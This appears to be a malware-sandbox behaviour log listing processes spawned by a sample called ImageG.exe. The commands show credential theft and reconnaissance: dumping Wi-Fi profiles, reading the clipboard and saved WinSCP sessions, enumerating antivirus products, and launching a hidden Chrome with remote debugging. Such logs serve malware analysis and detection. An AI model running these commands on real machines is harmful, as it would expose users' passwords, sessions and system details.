        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /F
        Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /F
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"Jump to behavior
